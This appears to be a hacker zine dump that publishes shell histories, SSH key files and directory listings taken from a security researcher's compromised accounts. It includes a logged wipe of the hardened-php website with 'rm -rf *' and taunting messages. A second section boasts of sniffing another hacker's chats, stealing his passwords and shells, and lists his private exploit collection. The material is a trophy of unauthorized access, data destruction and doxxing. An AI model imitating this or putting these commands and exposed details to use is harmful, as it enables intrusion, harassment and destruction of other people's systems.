cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\132\145\156\144'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
make
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`"
./php test.php
./php test.php > yyyy
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\065\056\060\056\060\122\103\063\056\150\141\162\144\145\156\145\144\056\141\154\160\150\141\057\132\145\156\144'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\065\056\060\056\060\122\103\063\056\150\141\162\144\145\156\145\144\056\141\154\160\150\141\057\132\145\156\144'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\065\056\060\056\060\122\103\063\056\150\141\162\144\145\156\145\144\056\141\154\160\150\141\057\132\145\156\144'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\065\056\060\056\060\122\103\063\056\150\141\162\144\145\156\145\144\056\141\154\160\150\141'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\132\145\156\144'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
make
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`"
./php test.php > yyyy
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\132\145\156\144'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
make
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`"
./php test.php > yyyy
php test.php > yyyy
./php test.php > yyyy
gdb ./php
./php test.php > yyyy
gdb ./php
./php test.php > yyyy
./php test.php > yyyy
gdb ./php
gdb ./php
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\132\145\156\144'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\1
62\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`"
gdb ./php
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\132\145\156\144'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\132\145\156\144'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`"
PROMPT_COMMAND='pwd>&7;kill -STOP $$'
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\132\145\156\144'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
make
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`"
gdb ./php
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`"
gdb ./php
gdb ./php
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162'`"
gcc -c test.s
gcc -c test.s
objdump --disassemble test.o
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162'`"
PROMPT_COMMAND='pwd>&7;kill -STOP $$'
gcc -c test.s
objdump --disassemble test.o
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`"
gdb ./php
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`"
ls
cd php-4.3.9
make
mc
make clean
cd ..
make clean
ls
ls -la
libtool
./configure --disable-cgi --without-mysql
make
mc
make
mc
man strtok
make clean
cd ..
make distclean
mc
make
make test
ls
cd sapi/cli
ls
objdump --disassemble php
objdump --disassemble php zend_hash_destroy
ls -,la
ls -la
man objdump
objdump --disassemble php > php_dis
mc
cat test.php
gdb php
ls
cd ..
gdb php
ls -la
cd sapi
cd cli
ls
rm -rf test.php
rm -rf yyyy
cd ..
ls
cd ..
ls
rm -rf php-5.0.0RC3.hardened.alpha/
rm -rf php-5.0.0RC3.hardened.alpha/ &
ls
gcc -o x x.c -m64
cc -o x x.c -m64
exit
cd php-4.3.9
ls
make distclean
ls
./config.nice
lex
./configure --help | more
ls
./config.nice
mc
exit
ls
cd php-4.3.9
make distclean
ls
./config.nice
ls
exit
ls
cd php-4.3.9
./config.nice
mc
ls
cat config.log | more
ls
vi ./configure
./config.nice
vi ./configure
./config.nice
CFLAGS=-m64 ./config.nice
make
ls
mc
ls
cd sapi
ls
cd cli
objdump
objdump --disassemble php > php.dis
cat php.dis | less
objdump --disassemble-all php > php.dis
cat php.dis | less
ls
mcedit sparc.s
vi sparc.s
ls
cd php-4.3.9
ls
cd sapi
ls
cd cli
ls
cat php.dis | more
cat php.dis | less
cat php.dis | grep jump
cat php.dis | less
ls
cd .
cd ..
cd ..
ls
cd ..
ls
vi sparc.s
gcc -m64 -c sparc.s
vi sparc.s
gcc -m64 -c sparc.s
vi sparc.s
gcc -m64 -c sparc.s
vi sparc.s
ls -la
objdump --disassemble-all sparc.o
quit
vi sparc.s
gcc -m64 -c sparc.s
objdump --disassemble-all sparc.o
cd php-4.3.9/sapi/cli/
cat php.dis | less
ls
cd ..
ls
cd ..
ls
cd ..
ls
vi sparc.s
ls
gcc -m64 -c sparc.s
cat sparc.s
vi t.c
gcc -m64 -o t t.c sparc.o
vi t.c
vi t.c
vi main
gcc -m64 -c sparc.s
gcc -m64 -o t t.c sparc.o
vi t.c
vi t.c
gcc -m64 -o t t.c sparc.o
vi sparc.s
gcc -m64 -c sparc.s
gcc -m64 -o t t.c sparc.o
./t
gdb ./t
ps -ax
vi t.c
ls
ls -la
gdb --core=core
ls
vi sparc.s
gcc -m64 -c sparc.s
gcc -m64 -o t t.c sparc.o
./t
gdb --core=core
gdb ./t
exit
gdb ./t
ls
vi sparc.s
gcc -m64 -c sparc.s
gcc -m64 -o t t.c sparc.o
objdump --disassemble-all t | more
objdump --disassemble t | more
ls
vi sparc.s
./t
gdb --core=core
ls
vi sparc.s
gcc -m64 -c sparc.s
gcc -m64 -o t t.c sparc.o
./t
gdb --core=core
vi sparc.s
gcc -m64 -o t t.c sparc.o
gcc -m64 -c sparc.s
gcc -m64 -o t t.c sparc.o
./t
gdb --core=core
gcc -c sparc.s
vi sparc.s
gcc -c sparc.s
vi sparc.s
ls
vi t.c
gcc -m64 -o t t.c sparc.o
vi sparc.s
gcc -c sparc.s
gcc -c sparc.s -m64
gcc -m64 -o t t.c sparc.o
objdump --disassemble t | more
cd php-4.3.9/sapi/cli
cat php.dis |less
ls
cd ..
cd ..
ls
cd ..
ls
vi sparc.s
gcc -m64 -c sparc.s
vi sparc.s
gcc -m64 -c sparc.s
vi sparc.s
gcc -m64 -c sparc.s
gcc -m64 -o t t.c sparc.o
objdump --disassemble t | more
quit
exit
gcc -o p p.c
./p
vi p.c
gcc -o p p.c
./p
vi p.c
gcc -o p p.c
./p
vi p.c
exit
ls
exit
ls
gunzip hardened-php-4.3.10-0.2.4.patch.gz ; tar xfz php-4.3.10.tar.gz ; rm -rf php-4.3.9 ; rm -rf php-5.0.0RC3.hardened.alpha ; rm -rf php-4.3.9.tar.bz2 ; cd php-4.3.10 ; patch -p1 -i ../hardened-php-4.3.10-0.2.4.patch ; ( ./configure --disable-cgi --without-mysql && make && make test )
mc
cat main/php_config.h
cat main/php_config.h | grep ZTS
cat main/php_config.h | grep TSRM
cat TSRM/TSRM.h | grep FETCH
ls
exit
ls
uname -a
exit
ls
ls -la
cat /etc/compilefarm-hosts
nslookup shell
exit
ls
rm -rf hardened-php-4.3.10-0.2.4.patch
rm -rf php-4.3.10*
exit
ls
tar xfj php-4.4.0.tar.bz2
cd php-4.4.0/
patch -p 1 -i ../hardening-patch-4.4.0-0.4.3.patch
./configure && make
make distclean
exit
ls
cd php-4.4.0
./configure && make
php
make test
make distclean
exit
ls
cd php-4.4.0
./configure && make
make test
mc
exit
cat /etc/hosts
cat /etc/compilefarm-hosts
ssh amd64-linux1
ssh amd64-linux2
exit
exit
exit
ls
cd php-4.4.0
make distclean
ls
./configure
vi configure
export TERM=xterm
vi configure
vi configure
./configure
vi configure
./configure
vi configure
./configure
./configure
export
CFLAGS=-m64 ./configure
make
make test
exit
cd /usr/share
ls
cd /usr/local/lib
ls
cd /usr/share/doc
ls
cd php4
ls
ls -la
cd ..
cd /usr/share/doc/php4-pear
1~
uname -a
exit
ls
id
exit
ls
vi tmp.c
gcc -o tmp tmp.c
./tmp
ls -la /tmp
ls -la /tmp/php*
l
ls
cat tmp.c
exit
ls
ls -la
vi tmp.c
export TERM=xterm
vi tmp.c
gcc -o tmp2 tmp.c
./tmp2
./tmp2
vi tmp.c
./tmp2
ls
rm php*
ls
gcc -o tmp2 tmp.c
./tmp2
exit
ls
rm php*
gcc -o tmp3 tmp.c
./tmp3
ls -la
rm php*
ls
ls -la /lib
ls -la /usr/lib
ls -la
ldd
ldd tmp3
cp /usr/lib/libc.so.1 .
ls -la
ls
exit
ls -la
hostname
exit
exit
-bash-3.00$ ls -al .ssh
total 24
drwxr-xr-x 2 sesser users 4096 Oct 31 23:33 .
drwxr-xr-x 7 sesser users 4096 Dec 11 13:58 ..
-rw-r--r-- 1 sesser users 1014 Oct 31 23:33 authorized_keys
lrwxrwxrwx 1 root root 44 May 23 2005 authorized_keys2 -> /home/users/s/se/sesser/.ssh/authorized_keys
-rw------- 1 sesser users 540 Oct 31 23:33 identity
-rw-r--r-- 1 sesser users 344 Oct 31 23:33 identity.pub
-rw-r--r-- 1 sesser users 1018 Dec 13 2004 known_hosts
-bash-3.00$ cat .ssh/known_hosts
alpha-linux1 1024 35 142661610879350341359910471229015228681863557274361028972906159368885950729429412070243572601011727293022894294971710488750808642013768282973033828185834438788727862517061993275144181705534556506018164267399772317843039076165952732450937868591345271838554272083652072933542024190556532714720492745111209697383
usf-cf-x86-linux-2,10.8.2.2 1024 35 144347210870008624161092316389337570289598552640606869693267014907110107235922562213496296766734209062113687399129525025829085075420716051620275524781941123288825674755436976445952529574552166131811031107907538556791201407280635865514664841157997240734410466817367385487747269556022421062445416008666512662307
x86-solaris1,10.8.2.23 1024 35 156124405163858389525519490764713367294283674543074297742218100301019637545681376986056756809303328612489667335638024010684487740029490306968634357301793226486480843227248170731904405916788419418635783380129621755044919574758532483804625690298711307770284227997332399767093431422272090601633367092487363364191
-bash-3.00$ cat .ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAuBF1ZxYmADf9Ugfa7JHN2KGNaV50CKhesGjHEra44IiTAIBoCgxPGbzldL3uorecobVqgavbEhrjjSztVEqLHGvnau4xI02AZgfGQ0hmeftLWCt0WrePeuU0HTRrtlIb2ZlTNjxsvFUnPaVeFfPHqWDRZv7SCTJRy4bJk92yVD0= ionic@cryptoland
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA0YfKov2JrPWOLxsoFksbHfj4XavpDQTKAcwle7ME1HSbTDwTAknXwWiBsxKV/JSzfmx0NHqAjV8LQD47yCC5rxCF6spLo0WtuwUrI4MBkdhkihOoqhg3VmlbCpRWTwsrsAh90hAJ9g007COMJRod/6BDHoK9s9OLw2tgUCZ9+mE= sesser@sf
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAwvlC0etEiKAAURisJs46W83kJEq0qX71ZDAlp8LQOa+ib3fBA7b33lNbkskdqDuu+anbIlLeSaQTxIa1kaxezkuksSFwK1cIo72dLaSDMw2/79q5ddPJB4sBQ60qGhb9zHQb7Q9KNA9HnyGYSMPog+pMrUL1R7a2MsohTRZM+hU= sesser@homebase
1024 35 143808617116634468337205489233272089485466682703555064206019641978897347333998435917695364538885745044943180415451840091912076126510412685627256983904948428717832714701391874570859361167980010259540104452327066697219794918919758471872243099024807933269046053582569275522091111562938360375588144850293713813871 sesser@cf.sourceforge.net
-bash-3.00$ exit
-~-~-~ l3tz try 4n0th3r b0x -~-~-~
[sesser@sc8-pr-shell1 sesser]$ ls -al
total 4084
drwxr-xr-x 7 sesser users 4096 Nov 23 2005 .
drwxr-xr-x 654 root root 12288 Jul 19 00:30 ..
-rw------- 1 sesser users 4949 Nov 27 2005 .bash_history
-rw-r--r-- 1 sesser users 24 Jan 23 2004 .bash_logout
-rw-r--r-- 1 sesser users 191 Jan 23 2004 .bash_profile
-rw-r--r-- 1 sesser users 124 Jan 23 2004 .bashrc
-rw-r--r-- 1 sesser users 5531 Jan 23 2004 .canna
-rw-r--r-- 1 sesser users 847 Jan 23 2004 .emacs
drwx------ 2 sesser users 4096 May 30 2005 .gnupg
drwxr-xr-x 14 sesser users 4096 Jul 11 2005 php-4.4.0
-rw-r--r-- 1 sesser users 4086074 Oct 18 2005 php-4.4.0.tar.bz2
drwxr-xr-x 3 sesser users 4096 Oct 18 2005 sesser@cf.sf.net
drwxr-xr-x 2 sesser users 4096 Jul 5 08:30 .ssh
-rw------- 1 sesser users 11220 Nov 23 2005 .viminfo
drwxr-xr-x 2 sesser users 4096 Jan 23 2004 .xemacs
-rw-r--r-- 1 sesser users 220 Jan 23 2004 .zshrc
-rw-r--r-- 1 sesser users 220 Jan 23 2004 .zshrc.rpmnew
[sesser@sc8-pr-shell1 sesser]$ cat .bash_history
ls
cd /home/groups/g/gc/gc-linux/htdocs/do
cd /home/groups/g/gc/gc-linux/htdocs/down/
ls
ls -la
cd /home/groups/g/gc/gc-linux/htdocs/down
ls
rm DOL.rar
ls -la
ls -la
cd /shares
cd /home/groups/b/ba/bastard
ls
ls -la
cd log
ls
cd ..
cd htdocs
ls
ls -la
cd apj
ls
cat index.html
cd ~
cd /home/groups/h/ha/hardened-php/
ls
cd htdocs
ls
vi index.php
vi index.php
cd /home/groups/h/ha/hardened-php/htdocs/
vi index.php
cd /home/groups/h/ha/hardened-php/htdocs/
vi index.php
cd /home/groups/h/ha/hardened-php/htdocs
ls
vi index.php
nano index.php
nano index.php
nano index.php
cd /home/groups/h/ha/hardened-php
ls
cd htdocs
ls
vi index.php
vi top.php
ls
vi index.php
whois phpwned.com
exit
ls
cd /home/groups/h/ha/hardened-php/htdocs/
ls
vi download.php
vi news.php
vi news.php
vi news.php
vi download.php
cp exploits.php exploits2.php
vi exploits2.php
vi exploits2.php
vi exploits2.php
vi exploits2.php
vi exploits2.php
cp documentation.php advisory-012004.php
vi advisory-012004.php
cp exploits2.php exploits.php
cd advisories
ls
cd ..
vi advisory-012004.php
cd /home/groups/h/ha/hardened-php
cd htdoc
cd htdocs
ls
vi exploits
vi exploits.php
vi exploits.php
cd /home/groups/h/ha/hardened-php/
cd htdocs/
vi exploits.php
vi exploits.php
vi exploits.php
cd /home/groups/h/ha/hardened-php/htdocs
ls
vi download.php
vi features.php
vi news.php
vi index.php
cd /home/groups/h/ha/hardened-php/htcods
cd /home/groups/h/ha/hardened-php/htdocs
ls
cd
ls
ls -la
ls
cd .ssh
ls
cat authorized_keys2
cat authorized_keys
exit
cd /home/groups
cd h/ha/hardened-php/
ls
cd htdoc
l
scd htdocs/
cd htdocs/
ls
vi index.php
vi top.php
ls
vi index.php
whois phpwned.com
exit
ls
cd /home/groups/h/ha/hardened-php/htcods
cd /home/groups/h/ha/hardened-php/htdocs
ls
vi news.php
vi news.php
vi download.php
ls
cd /home/groups/h/ha/hardened-php/htdocs
ls
cp news.php exploits.php
vi exploits.php
vi top.php
vi exploits.php
vi exploits.php
cd /home/groups/h/ha/hardened-php/htdocs/
ls
vi download.php
vi news.php
vi news.php
vi news.php
vi download.php
cp exploits.php exploits2.php
vi exploits2.php
vi exploits2.php
vi exploits2.php
vi exploits2.php
vi exploits2.php
cp documentation.php advisory-012004.php
vi advisory-012004.php
cp exploits2.php exploits.php
cd advisories
ls
cd ..
vi advisory-012004.php
cd /home/groups/h/ha/hardened-php
cd htdoc
cd htdocs
ls
vi exploits
vi exploits.php
vi exploits.php
cd /home/groups/h/ha/hardened-php/
cd htdocs/
vi exploits.php
vi exploits.php
vi exploits.php
cd /home/groups/h/ha/hardened-php/htdocs
ls
vi download.php
vi features.php
vi news.php
vi index.php
cd /home/groups/h/ha/hardened-php/htcods
cd /home/groups/h/ha/hardened-php/htdocs
ls
cp exploits.php exploits2.php
vi exploits2.php
vi exploits2.php
vi getfile.php
ls -la
cp punbb_change_email.732578.py exploit.1.xdfhuj
vi getfile.php
vi getfile.php
vi getfile.php
cat exploits2.php
vi exploits2.php
vi getfile.php
vi getfile.php
vi getfile.php
vi getfile.php
cd /home/groups/h/ha/hardened-php/htdocs/
dos2unix
dos2unic exploit.1.xdfhuj
dos2unix exploit.1.xdfhuj
ls -la *.py
ls -la ex*1*
chmod a+r exploit.1.xdfhuj
mv exploit.1.xdfhuj exploit.1.xdfhuj.1
vi getfile.php
exit
cd /home/groups/h/ha/hardened-php/htdocs
vi index.php
vi index.php
vi index.php
vi index.php
cd /home/groups/h/ha/hardened-php/htdocs/
vi index.php
vi index.php
vi index.php
vi index.php
vi /home/groups/h/ha/hardened-php/htdocs/top.php
cd /home/groups/h/ha/hardened-php/htdocs/
vi news.php
vi news.php
cd /home/groups/h/ha/hardened-php/htdocs/
vi download.php
cd /home/groups/h/ha/hardened-php/htdocs
ls
vi hardened-php-signature-key.asc
ls
vi hard.txt
gpg
gpg --import-key hardened-php-signature-key.asc
gpg --import hardened-php-signature-key.asc
ls *.sig
gpg *.sig
gpg hardened-php-5.0.4-0.2.7.patch.gz.sig
gpg hardened-php-5.0.3-0.2.5.patch.gz.sig
cd /home/groups/h/ha/hardened-php/htdocs
ls
vi advisory-012004.php
ls
cp advisory-012004.php advisory-012005.php
mv 012005.txt advisories/
vi advisory-012005.php
vi exploits.php
vi exploits.php
vi exploits.php
vi advisories/012005.txt
cd /home/groups/h/ha/hardened-php.net
cd /home/groups/h/ha/hardened-php/htdocs
ls
vi news.php
exit
cd /home/groups/h/ha/Hardened-php/htdocs
cd /home/groups/h/ha/hardened-php/htdocs
ls
vi top.php
vi top.php
vi index.php
vi index.php
vi top.php
ls -la *.php
cat index.php
vi preview.php
ls -la *.php
vi advisory-012004.php
vi advisory-012005.php
ls -la *.php
vi documentation.php
ls -la
ls -la *.php
vi documentation.php
ls
ls -la
ls -la *php
vi exploit.php
vi exploits.php
ls -la *.php
vi features.php
ls -la *.php
vi news.php
ls -la
ls -la *.php
vi news.php
ls -la
vi preview.php
vi download.php
cd /home/groups/h/ha/hardened-php/htdocs
vi top.php
vi news.php
cd /home/groups/h/ha/hardened-php/htdocs/
cp advisory-012005.php advisory-022005.php
vi advisory-022005.php
ls -la
cd /home/groups/h/ha/hardened-php/htdocs
ls
cp advisory-052005.php advisory-062005.php
vi advisor*06*php
ls
vi exploits.php
vi exploits.php
exit
cd /home/groups/h/ha/hardened-php/htdocs/
vi exploits.php
cd /home/groups/h/ha/hardened-php/htdocs
ls
cat punbb_change_email.732578.py
exit
ls
ls -la
exit
ls -la
rm php-4.4.0.tar.gz
tar xfj php-4.4.0.tar.bz2
scp -r php-4.4.0 sesser@cf.sf.net
scp -r php-4.4.0 sesser@cf.sf.net:.
scp -r php-4.4.0 sesser@cf.sourceforge
quit
exit
cd /home/groups/h/ha/hardened-php.net
cd /home/groups/h/ha/hardened-php
ls
cd htdocs
ls
vi error404.php
ls
mv index.php index.php.old
cp error404.php index.php
rm -rf ha*
ls -la
rm -rf advi*
rm ex*
y
ls -la
rm -rf archive.php
rm -rf gfx
rm -rf htdocs
rm -rf index.php.old
cat error404.php
cp error404.php ..
cp index.php ..
rm -rf *
cp ../index.php .
vi .htaccess
vi .htaccess
exit
[sesser@sc8-pr-shell1 hardened-php]$ cd /home/groups/x/xb/xbox-linux/
[sesser@sc8-pr-shell1 xbox-linux]$ ls -al
total 32
drwxrwsr-x 7 dummy xbox-linux 4096 Jun 1 02:42 .
drwxr-sr-x 116 root root 4096 Jul 17 14:35 ..
drwxr-sr-x 2 mist xbox-linux 4096 Jun 1 02:59 backup
drwxrwsr-x 2 dummy xbox-linux 4096 Sep 18 2005 cgi-bin
drwxrwxr-x 13 vema xbox-linux 4096 Apr 4 05:54 htdocs
-rw----rw- 1 vema users 181 Jul 26 2003 .htpasswd
drwxr-sr-x 5 paulproteus xbox-linux 4096 Dec 26 2004 moin
drwxr-sr-x 2 vema xbox-linux 4096 Oct 17 2004 php
g00d j0b s3cur1ty 3xp3rt. wh4t3v3r h4pp3nd t0 y0u h4ck1ng?
05.txt -~-~-~ tal0n g3tz h4x up!
well well well.. another episode of tal0n. the only cat cool enough to be in
every issue.
--------------------------------------------------------------------------------
Checklist:
[1] Find Proof Skew is Tal0n. :CHECK
[2] Get Into BHUGC/Darkminds Group and Steal Warez. :CHECK
[3] Get His Passwdz. :CHECK
[4] Get His Shellz. :CHECK
[5] Laugh For Dayz At This Dork. :CHECK
--------------------------------------------------------------------------------
so lets get this shit started.
[1] PROOF SKEW IS TAL0N
from sniff logs off of skew's box:
(01:50:11) omgseckz : tell me the truth.. are you really tal0n ?
(01:50:32) Skew --> http://skew.blackhat.ru: yep.. but dont ever address me as
my alter ego again plz
[2] GET INTO BHUGC // DARKMINDS AND STEAL WAREZ.
from txt file on skew's box:
skew'z explaination:
BlackHat UnderGround Community is a community of codes in the
blackhat community that contribute code on a server that is shared with the
other blackhats who have access to it. The community stays updated and more
alive when people upload more and more private exploits, tools, shellcodes, and
other non-public works of the community member.
Currently, we are just starting up and may have a server in a week
or so. If you are interested in joining the community, the requirement is when
the server is up and we are organized to upload ONE exploit written by yourself
and we encourage the uploads to atleast once a month although not required.
Ok, looks like no problem gettingin. (NOTE): the only thing skew has coded is
imap4life.pl and weve heard rumors someone else coded it.
~-~-~-~-~-~-~-~-~-~-~-~-~-~
skew@krack:~/darkminds$ ls
codes/
examples/
exploits/
papers/
research/
skew@krack:~/darkminds$ ls *
codes:
atomix-newlimit-1.0a.c
dfnctsc-kaiten.c
door.pl
nixfo-ng-1.6.tar.gz
scavenge-2.3.0b.zip
sh-mirk.tgz
sh2-power
shaft[priv].tar.gz
shaftmaster.c
sshbrute.c
stj.c
examples:
fmt/ heap/ stack/
exploits:
0x90_bsd.c*
THCREALbad.c*
gotfault-exim.tar.gz*
imap4life.pl*
m00-apache-priv8.tar.gz*
m00-smtpclame.c*
priv8Xone.c*
pwned3*
seXFree.c*
ttdb_exp.py*
557vnc.extra.c*
TTsharefile*
h4ckwebdav.tar.gz*
kcmshadow.c*
m00-deadbear.tar.gz*
m00seahouse-1.0.tar.gz*
priv8halflife.c*
qnx-phfont.c*
shoutdead.c*
unreal.c*
ES-PsyJack.tar.gz*
UHAGr-jidentd.tar.gz*
hackbsdcpanel.tar.gz*
krad2.c*
m00-deadbear2.tar.gz*
mayday.c*
priv8sambar.pl*
qnx-phgrafx.c*
shv5.tar.gz*
winwrk.tar.gz*
One-to-rule-them-all.c*
bmon2.c*
hackbsdkcms.tar.gz*
m00-0Wn-0x333.c*
m00-deadbear3.tar.gz*
openssl-too-open-priv8.tar.gz*
proftd_put_down2~m00.c*
real_magic.c*
subversion.c*
wuftpd.tar.gz*
THCIISSLame-linux.c*
cvs.c*
halflife2*
m00-SPAm.zip*
m00-samba-pwnd.tar.bz2*
priv8LEEEET.pl*
proftd_put_down2~m002.c*
remap_adv.c*
tr_tru.pl*
xfree.c*
papers:
research:
skew@krack:~/darkminds$ ls */*
codes/atomix-newlimit-1.0a.c
codes/sshbrute.c
exploits/UHAGr-jidentd.tar.gz*
exploits/kcmshadow.c*
exploits/m00-smtpclame.c*
exploits/proftd_put_down2~m002.c*
exploits/subversion.c*
codes/dfnctsc-kaiten.c
codes/stj.c
exploits/bmon2.c*
exploits/krad2.c*
exploits/m00seahouse-1.0.tar.gz*
exploits/pwned3*
exploits/tr_tru.pl*
codes/door.pl
exploits/0x90_bsd.c*
exploits/cvs.c*
exploits/m00-0Wn-0x333.c*
exploits/mayday.c*
exploits/qnx-phfont.c*
exploits/ttdb_exp.py*
codes/nixfo-ng-1.6.tar.gz
exploits/557vnc.extra.c*
exploits/gotfault-exim.tar.gz*
exploits/m00-SPAm.zip*
exploits/openssl-too-open-priv8.tar.gz*
exploits/qnx-phgrafx.c*
exploits/unreal.c*
codes/scavenge-2.3.0b.zip
exploits/ES-PsyJack.tar.gz*
exploits/h4ckwebdav.tar.gz*
exploits/m00-apache-priv8.tar.gz*
exploits/priv8LEEEET.pl*
exploits/real_magic.c*
exploits/winwrk.tar.gz*
codes/sh-mirk.tgz
exploits/One-to-rule-them-all.c*
exploits/hackbsdcpanel.tar.gz*
exploits/m00-deadbear.tar.gz*
exploits/priv8Xone.c*
exploits/remap_adv.c*
exploits/wuftpd.tar.gz*
codes/sh2-power
exploits/THCIISSLame-linux.c*
exploits/hackbsdkcms.tar.gz*
exploits/m00-deadbear2.tar.gz*
exploits/priv8halflife.c*
exploits/seXFree.c*
exploits/xfree.c*
codes/shaft[priv].tar.gz
exploits/THCREALbad.c*
exploits/halflife2*
exploits/m00-deadbear3.tar.gz*
exploits/priv8sambar.pl*
exploits/shoutdead.c*
codes/shaftmaster.c
